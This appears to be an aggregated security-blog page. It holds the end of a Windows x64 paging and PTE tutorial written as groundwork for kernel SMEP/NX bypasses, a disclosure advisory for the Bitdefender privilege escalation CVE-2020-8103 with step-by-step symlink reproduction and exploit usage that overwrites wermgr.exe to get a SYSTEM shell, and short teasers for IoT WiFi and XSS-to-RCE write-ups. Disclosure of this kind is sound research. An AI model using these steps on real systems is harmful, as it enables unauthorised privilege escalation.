Technically, a 64-bit system only uses 48 bits of its total power. This is because if a 64-bit system allowed all 64 bits to be addressed, the system would need to be able to address 16 exabytes of total virtual memory. 1 exabyte is equivalent to 1000000 terabytes (TB). The MMU would not be able to keep track of all of this from a translations perspective firstly (efficiently), and secondly (and most importantly) systems today cannot support this much virtual memory.

The CPU implements a “governor” of sorts, which limits 64-bit addresses to 48-bit addresses. An address in which bits 63-47 are sign extended is known as a canonical address.

Sign extending bits 63-47 limits the virtual address space to 256 TB of RAM. This is still a lot, but it is still feasible.

Let’s take a look to see how this all breaks down.

Referencing the Intel manual again, sign extending occurs in the following manner. Bit 47 is responsible for what bits 63-47 will be set to.

If bit 47 is set to 0, bits 63-48 will also be set to 0. If bit 47 is set to 1, bits 63-48 will be set to 1 (resulting in hexadecimal F’s in the virtual address).

The below chart, from Intel shows what addresses are valid and what addresses are invalid, in accordance with canonical addressing and sign extending. Note that we are only interested in the 48-bit addressing chart. 56-bit addressing refers to level 5 paging and 64-bit addressing refers to using the whole 64-bit address space.

Let’s look at two examples below.

The first example is the address KERNELBASE!VirtualProtect which has a virtual memory address of 00007ffce032cfc0. Breaking the address down into binary, we can see bit 47 is set to 0. Subsequently, bits 63-48 are also set to 0.

Generally, user mode addresses are going to be sign extended with a 0.

Taking a look at a kernel mode address, nt!MiGetPteAddress, we can see in this case bit 47 is set to 1. Meaning bits 63-48 are also set to 1, resulting in all hexadecimal F’s occurring in the virtual address as seen below.

Now that we see how addressing is limited, let’s get into the breakdown of a virtual address.

(Question to you, the reader. Now that we know 64-bit systems only utilize 48 bits, do you see a clear need for 128-bit processors in the near future?)

The Anatomy of a Virtual Address (In All of Its Glory)

Let’s talk about paging structures and page table entries once again before we get into breaking down a virtual address.

Recall there are 4 main paging structures:

  1. Page-Map Level-4 Table (PML4)
  2. Page-Directory-Pointer Table (PDPT)
  3. Page-Directory Table (PDT)
  4. Page Table (PT)

As a point of contention, a page table entry for each of these structures removes the “T” from the acronym and replaces it with an “E”. For instance, an entry from the PDT is known as a PDE. An entry from the PT is known as a PTE and so on.

Recall that each one of these structures is a table that has 512 entries each. One PML4E can address up to 512 GB of memory. One PDPE can address 1 GB. One PDE can address 2 MB. Finally, one PTE can map 4 KB, or a physical memory page.

Note that the actual size of each entry is 8 bytes (the size of a virtual memory address in a 64-bit architecture).

Let’s talk about PML4 table briefly, which cannot be talked about without mentioning the CR3 register.

The CR3 register actually contains a physical memory address, which actually serves as the PML4 table base. This can be seen in the image below, where CR3 loads an actually physical memory address.

This is how the paging process begins, as the PML4 can be fetched from the CR3 register.

Again, to reiterate, The PML4 (via the CR3 register) indexes the PDPT table and fetches an entry. The PDPT indexes the base of the PDT table and fetches an entry. The PDT table indexes the PT table and fetches a 4 KB physical memory page.

Before moving on, there is one special thing to note, and that is the actual page table (PT).

Once the page table (PT) has been indexed in bits 20-12, bits 11-0 no longer need to fetch an index from any other paging structures. Bits 11-0 actually serve as an offset to a physical memory page 4 KB in size. Recall that an offset is the distance between two places (generally from a base, the PT in this case, to another location). Bits 11-0 simply serve as the actual distance from the page table base to the actual location of the physical memory. We will see this outlined very shortly when we perform a page translation in WinDbg.

Now that we understand at a bit of a lower level how each paging structure is indexed, let’s take it an even lower level.

Finally, an Example!

VirtualAlloc() is a routine in Windows that creates a region of virtual memory and returns a pointer to this virtual memory.

In our example, the virtual memory address 510000 is a virtual memory address that was created by KERNELBASE!VirtualAlloc. Let’s run the !pte command in WinDbg to see what we are working with here.

One thing to notate before moving on, WinDbg references a few paging structures and entries a bit differently. Namely, they are:

  1. PXE = PML4E
  2. PPE = PDPE

Moving on, we can see each structure’s entries can all be found at their respective virtual addresses, shown above as:

  1. PML4E at FFFFF6FB7DBED000
  2. PDPE at FFFFF6FB7DA00000
  3. PDTE at FFFFF6FB40000010
  4. PTE at FFFFF68000002880

This is because the !pte output converts the entries to virtual addresses before being displayed. We don’t care so much about the virtual addresses (for the time being) because we are trying to see how virtual addresses are converted into physical addresses.

In order to reach our goal, right now we only care about pfn which we can see from the !pte output. Let’s understand the pfn means firstly, as this will help us understand the output of !pte and fetching a physical page associated with a virtual page.

A PFN, or page frame number, refers to the next paging structure in the hierarchy. PFNs work with PTEs, in that PTEs fetch the PFN for the next paging structure. That PFN is then multiplied by 0x1000 (4 KB) to retrieve the physical address of the next paging structure. We will hit more on this now.

In the output of !pte we see there is a PML4E. A PML4E , as we know, will fetch the base address of the PDPT table. From there, it will index an entry from the next table, known as a PDPE.

The PFN, as we can see from the output in WinDbg in the earlier screenshot, that PML4 is using to index the PDPT table is 7bbc8. This means this should be the page frame number for the PDPT, as we know a page frame number refers to the next paging structure in the hierarchy.

We will now use !vtop to convert the PDPT to a physical address to verify that the PML4E entry is indexing the correct paging structure.

Let’s breakdown this command firstly.

The 7be59000 value in the above command is the base paging structure in the CR3 register, the PML4 physical address. When using !vtop, you use this address to specify the base paging structure. After that, we have the virtual address we want to convert.

As we can see, the PDPT is located at a physical address of 7bbc8000! This is perfect, because this is the PFN value used by the PML4 structure to index the next paging structure, PDPT. Recall earlier, that we multiply the PFN (7bbc8 in this case) by 0x1000, which gives us a physical memory address of 7bbc8000 - which represents the PDPT.

Let’s verify in WinDbg with !dd, which will dump physical memory, that the virtual address of the PDPE and the physical address both are the same.

As we can see, the physical and virtual memory addresses contain the same values.

Too Many Acronyms!

This is an ideal example to show that a physical page of memory is actually NOTHING MORE than a PFN multiplied by 0x1000 and an offset to the physical memory page! A PFN, as we can recall, is a reference to the base of the next paging structure.

Since we converted the PDPT address (which is a base address to begin with), there was no offset in the physical translation, meaning that the PFN was appended with 0’s.

This is mainly because we were fetching the base address of a paging structure, which means it won’t be offset from anything.

If our virtual address would have been FFFFF6FB7DA00008, for instance, our physical address would have been 7bbc8008. This is because the address is at an offset of 0x8 from the base of the PFN!

Awesome, we know know what a physical memory address looks like at a high level. But each entry in a paging structure (a PTE) contains more metadata. What does this metadata look like and how is it useful?

PTEs - For Real This Time

Let’s take a look back at an image that was already displayed, in the !pte output.

More specifically, let’s take a look at the PTE entry, furthest to the right.

PTE at FFFFF68000002880
contains 7A9000007BBA9867
pfn 7bba9     ---DA--UWEV

Let’s take a look at the entry, more specifically the contains line which contains 7A9000007BBA9867.

We can clearly see the PFN here, in between the 7A900000 and 867. But what do these other numbers mean? Additionally, what does ---DA--UWEV mean? These refer to “control bits”, which provision various permissions, features, etc to the memory page. Let’s take a look at each of these bits.

Here are a list of some of the possible control bits. These bits are the ones we care about, and it is not an exhaustive list.

  1. P - The PTE is valid if this bit is set
  2. R/W - Writing is enabled if this bit is set
  3. U/S - If this bit is set, the page is a user mode page. If this bit is clear, the page is a supervisor (kernel) mode page
  4. D - If this bit is set, a write has been made to this page, making it a “dirty” page
  5. A - If this bit is set, this memory page has been referenced at some point

Mouth Of The River

Again, this was by no means meant to be an exhaustive and comprehensive “tell all” of memory paging. This article barely scratched the surface. However, understanding things like control bits and virtual memory and having that as prerequisite knowledge allows you to understand bypassing mitigations such as NX in kernel pool memory, or more ways of bypassing SMEP. The next post will go into bypassing SMEP and NX in the kernel by way of the prerequisite knowledge laid out here.

You know the drill, any comments, questions, corrections, feel free to reach out to me. Until then!

Peace, love, and positivity! :-)

BitDefender Antivirus Free 2020 Elevation of Privilege (CVE-2020-8103 )

By: admin
24 April 2020 at 10:24


Assigned CVE: CVE-2020-8103 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 18/03/2020

Exploit Code

Vendor’s Advisory

An Elevation of Privileges (EoP) exists in Bitdefender Antivirus Free 2020 < . The latest version we tested is BitDefender Free Edition The exploitation of this EoP, gives the ability to a low privileged user to gain access as NT AUTHORITY\SYSTEM . The exploitation has been tested in installation of BitDefender on Windows 10 1909 (OS Build 18363.720) 64bit .


The exploitation allows any local, low privileged user, to change the Discretionary Access Control List (DACL) of any chosen file. The access you obtain depends on which file you are going to backdoor/overwrite. In the Proof of Concept (PoC) we overwrite the file system32/wermgr.exe and we pop a cmd.exe running as NT AUTHORITY\SYSTEM . The exploitation works with the default installation of BitDefender. When the BitDefender detects a threat, it gives the ability to the user to choose what action to take. The user can choose to Quarantine the threat. After the threat has been placed in Quarantine, the user can choose to restore it. The problem arises because the BitDefeder restores the file as NT AUTHORITY\SYSTEM and without impersonating the current user. This allows the user to create a symlink and restore the file to an arbitrary location or overwrite files which are running as SYSTEM.


  1. Put an EICAR file (or any other file which can be detected as a threat) under an empty folder which you fully control. For example, put an EICAR file to C:\Users\Public\Music
  2. Scan the EICAR file (e.g C:\Users\Public\Music\eicar.txt) with the BitDefender.
  3. When the BitDefender detects the threat, choose to Quarantine the file.
  4. Give some time to the BitDefender and rename the folder C:\Users\Public\Music to C:\Users\Public\Music2 .
  5. Create the symlink C:\Users\Public\Music\eicar.txt (e.g with the CreateSymlink.exe from symboliclink-testing-tools of project zero) and target the file you wish to control. For example CreateSymlink.exe C:\Users\Public\Music\eicar.txt c:\windows\system32\wermgr.exe .
  6. Add the c:\windows\system32\wermgr.exe to the exception list of BitDefender.
  7. Go back to BitDefender and restore the C:\Users\Public\Music\eicar.txt . The first time it may fail. Click restore again.
  8. The BitDefender, running as NT AUTHORITY\SYSTEM, will follow the symlink and will overwrite the file c:\windows\system32\wermgr.exe .
  9. The c:\windows\system32\wermgr.exe will have a new DACL, which gives your user full access. You can overwrite the file with anything you wish.

Video PoC Step By Step

The exploit takes 2 arguments. The second argument is the file we want to overwrite. The first argument, is the file with which we want to overwrite it. As for example the execution:

Exploit.exe C:\users\attacker\Desktop\1.exe c:\windows\system32\wermgr.exe

will overwrite the file c:\windows\system32\wermgr.exe with the file C:\users\attacker\Desktop\1.exe .

The 1.exe is irrelevant to the exploitation. You can choose any file you wish and you can override any file you like. the 1.exe will just execute the cmd.exe to the current user’s session. For example you can execute

Exploit.exe C:\users\attacker\Desktop\test.txt c:\windows\system32\wermgr.exe

and you will overwrite the c:\windows\system32\wermgr.exe with the file C:\users\attacker\Desktop\test.txt

00:00 – 00:56: I present the environment. The low privilege user, the windows version, the BitDefender version and the DACL of the file c:\windows\system32\wermgr.exe . As we can see the user attacker has limited access to the file.

00:56 – 01:54: We run the exploit and the first thing we have to do is to add as an exception the file we target. In this case the file c:\windows\system32\wermgr.exe

01:54 – 02:48: After we add the exception, we go back to the exploit and we press ENTER. After the ENTER button is pressed, the exploit should print three lines which inform us about the AV. At this point, the exploit has created the EICAR file under the C:\Users\Public\Music\ folder. We go to this folder and we scan the file. We opt to move it to the Quarantine. Until this point, there is no reason for the exploit to fail. It just creates the EICAR file. If you do not see the three lines which are presented in the video and inform you about the AV, ensure you have pressed the ENTER a few times.

02:48 – 03:49: At this point the exploit checks that the EICAR file has been removed. In 30″ more or less you should see the message “I go for a coffee. Give me a sec.” . If for some reason you don’t see the message after a few seconds, press ENTER a few times inside the Exploit window. After this message, the Exploit renames the folder C:\Users\Public\Music to C:\Users\Public\Music2 and there is a sleep for 50″ . If you don’t see the second message “I am back. Oh no the bell. BRB.” after 50″ – 60″ just press ENTER again in the exploit window.

03:49 – 04:00: After the message “I am back. Oh no the bell. BRB.” the exploit creates the Symlink. It will create the symlink C:\Users\Public\Music\RESTORE_ME__* * *.txt which targets the c:\windows\system32\wermgr.exe . Then the exploit instructs us to restore the file.

04:00 – 04:20: We go back to the BitDefender and we restore the file. As we observe, we have to press the restore button two times. The BitDefender will restore the eicar file and will overwrite the c:\windows\system32\wermgr.exe . The c:\windows\system32\wermgr.exe will have a new DACL which allows us to overwrite it. The exploit will overwrite the c:\windows\system32\wermgr.exe with our binary “1.exe” . At this point the exploit should terminate in a few seconds. If you observe a delay on the exploit, press ENTER a few times.

04:20 – end: This is irrelevant with the BitDefender issue. This is just a way to trigger the execution of the file c:\windows\system32\wermgr.exe (which is now the 1.exe) as SYSTEM and gain a shell as NT AUTHORITY\SYSTEM . As we can see the c:\windows\system32\wermgr.exe has been ovewritten by the 1.exe and the new DACL gives the “attacker” full access over the file.



You can find the exploit code in our Github at

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at


Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at


Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at


Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at

The post BitDefender Antivirus Free 2020 Elevation of Privilege (CVE-2020-8103 ) appeared first on REDYOPS Labs.

NotSoSmartConfig: broadcasting WiFi credentials Over-The-Air

20 April 2020 at 16:00
During one of our latest IoT Penetration Tests we tested a device based on the ESP32 SoC by EspressIF. While assessing the activation procedure we faced for the first time a beautiful yet dangerous protocol: SmartConfig. The idea behind the SmartConfig protocol is to allow an unconfigured IoT device to connect to a WiFi network without requiring a direct connection between the configurator and the device itself – I know, it’s scary.

Tabletopia: from XSS to RCE

By: voidsec
8 April 2020 at 15:02

During this period of social isolation, a friend of mine proposed to play some online “board games”. He proposed “Tabletopia”: a cool sandbox virtual table with more than 800 board games. Tabletopia is both accessible from its own website and from the Steam’s platform. While my friends decided to play from their browser, I’ve opted […]

The post Tabletopia: from XSS to RCE appeared first on VoidSec.
